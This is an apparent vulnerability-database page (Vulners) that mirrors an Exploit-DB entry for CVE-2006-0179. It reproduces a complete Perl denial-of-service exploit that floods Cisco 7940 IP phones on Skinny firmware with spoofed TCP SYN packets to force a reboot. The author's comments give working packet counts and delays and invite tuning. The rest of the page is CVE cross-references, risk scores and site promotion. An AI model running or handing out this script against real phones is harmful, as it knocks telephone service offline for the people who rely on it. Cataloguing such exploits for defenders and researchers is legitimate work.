Lucene search
+L

Cisco IP Phone 7940 - Reboot (Denial of Service)

🗓️ 10 Jan 2006 00:00:00Reported by kokaninType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

Cisco 7940 IP Phone Reboot DoS via Skinny Protoco

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2006-0179
11 Jan 200621:00
cve
Cvelist
CVE-2006-0179
11 Jan 200621:00
cvelist
NVD
CVE-2006-0179
11 Jan 200621:03
nvd
Prion
Code injection
11 Jan 200621:03
prion
Tenable Nessus
Cisco IP Phone Improper Restriction of Operations within the Bounds of a Memory Buffer (CVE-2006-0179)
4 Dec 202400:00
nessus
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
        ip => {
                saddr => $ARGV[0],
                daddr => $ARGV[1]
                },
        tcp=> { dest => $ARGV[2],
                syn => 1,
                seq => 0,
                ack => 0}
        });
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };

# milw0rm.com [2006-01-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jan 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.13576
46